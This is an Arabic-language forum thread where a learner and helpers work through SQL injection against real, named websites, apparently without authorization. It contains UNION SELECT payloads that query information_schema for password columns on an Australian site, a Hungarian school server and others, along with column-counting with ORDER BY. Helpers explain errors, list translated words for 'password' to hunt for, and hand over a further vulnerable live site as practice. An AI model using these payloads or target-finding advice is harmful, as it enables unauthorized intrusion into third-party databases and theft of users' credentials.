سؤال بسيط فى دورة sql

انا وصلت لدرس الثامن بطبق نفسى الى هنالك بيقولى ايرور وجبت العواميد وكلة صح
اصدار القاعدة5 شوف فية حاجة غلط فى الى انا كتبة ولو فية صلحولى
خشوا هنا وقولى
http://www.ath-elite.com.au/trainers.php?id=-28 UNION SELECT
1,concat(table_name,0x3a,column_name,0x3a,table_sc hema),3,4,5+from+information_schema.columns+where+ column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

السلام عليكم و رحمة الله و بركاته

بصراحة بما أنك قد وصلت لتلك المرحلة من الحقنة يعني أنك فهمت مبدأ الحقن، بالتوفيق

راح أحاول أشرح لك قدر ما تفهم فقط !!!

شوف أخي، لو تلاحظ أنك في الحقنة كنت تبحث عن عمود إسمه يشابه أو يقارب كلمة pass

و ذلك من خلال الإستعلام التالي : where+column_name+like+%pas%

و إن وجده، راح يظهر لك إسم الجدول لي موجود عليه العمود و إسم العمود و إسم جدول السجما

و ذلك من خلال إستعلامك لي واضعه أنت شوف : concat(table_name,0x3a,column_name,0x3a,table_sche ma)

و لكن لا تخاف إستغلالك صحيح، فلماذا نتج لك الخطأ ؟

أنا راح أجيبك، لانو عند وضعك للإستعلام لم يوجد أي عمود يشبه كلمة %pas% و هذا لا يعني أنك خاطئ

نصيحة مني أن لا تعتمد على مثل هذه المواقع

و الحقنة قد تستطيع إكمالها و لكن بدون فائدة و السبب أنه لا يوجد عمود خاص بالباسوارد

و مثل هذه المواقع تجدها لا تعتمد على تسجيل الأعضاء في قاعدة البيانات، كما تجدها لا تعتمد على إدارة الموقع من خلال لوحة التحكم و إنما المدير يدير موقعه إما مباشرة من السيبنل أو من الأف تي بي أو من سيرفره الشخصي على ما أعتقد

أتمنى تكون فهمت الفكرة و لو قليلا

نصيحة أخيرة : في الحقن تأكد أن موقع واحد للتعلم لا يكفي، حاول إيجاد مواقع كثيرة و لا تعتمد على ما يأتي في الدورات فقط، لأن في الدورات يفهمك الأساس، و على ذلك الأساس يجب أن تكمل وحدك لتفهم الباقي

بالتوفيق إن شاء الله !!!

طب بوص يا اخى انا كدة ماشى مظبوط والحمد لله عايز مواقع سهلة كتير اجرب اجيب عليها
العمود المصاب واجرب عليها دية لانى دورت ملاتشى

الانترنت عندي ضعيف جدا عشان ماقدرتش احقنه واعرف وين المشكله
اهم شيء يكون الاستعلام بجلب التابلز بعدين راح تقدر تعرف وين الجدول الصحيح لكن اهم نقطه انو تعرف كيف تتعامل مع لغة الموقع
انا مثلا بدي احقن موقع برازيلي الباس يكون senha هو كلمة password
مثلا موقع ارجنتيني راح يكون clave وهي كلمة باسورد
موقع دنيماركي navn وهي كلمة باس
موقع اكرانيا ورومانيا راح تكون hoslo وهي باسورد
لازم تعرف لغة الموقع عشان تقدر ترجم حقنتك
لذا دايما استعين بالله ثم باستعلام tables

شكرا جدا ليكوا كلكم ما شاء الله
بس انا عايز موقع اجرب علية الحجات دية عربى اجرب علية بس مثلا العواميد تكون كل حاجة سهلة اجرب علية عشان اخلصة بسرعة ممكن

ادخل غرفة الحقن تلاقي مواقع مصابه ومحقونه ادرب عليها
موفق باذن الرحمن

انا هدور بس انا عايز منك انت مع انك محترف عايز واحد سهل كل حاجة سهلة اجرب علية
دورة الحقن كلها لو تجيبة تشكر اوى وربنا يخليك لينا لانى انت مبتبخلشى برد

اوك انا اسف جدااا
انا عايز بقة موقع اجرب علية يكون سهل

http://starsupporta.harmonouniversa....show.php?id=27

انا مش عايز بردو شوفلى اية الغلط
http://starsupporta.harmonouniversa....how.php?id=-27 UNION SELECT 1,2,concat(table_name,0x3a,column_name,0x3a,table_ schema),4,5,6,7+from+information_schema.columns+wh ere+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

عودة من جديد

أخي لو بدك أعطيك موقع و راح نحقنه بإذن الله

يعني أضع الرابط و أتركك تستخرج المعلومات لوحدك

و لو ما تستطيع راح أساعدك

بوص هاتلى موقع اعمل علية كل حاجة واستخرج بيناتة وخلاص يا باشا

يا أخي لا تقلق، نحن هنا للمساعدة

تفضل، هذا موقع مصاب و سهل جدا إستخراج المعلومات :

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1

لو قدرت تستخرج المعلومات يعني خلاص تقدر تشتغل بالـ SQL

حاول فقط التركيز قبل لا تعمل و تقولي شوف وين المشكلة

بالتوفيق ....

بوص انا اهوة استخدمت
order by
لغيت لما عرفت عدد العواميد لاتهم 8
عملت الموضع كدة شوف قولى حاجة غلط اصل بيطلعلى ايرور
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--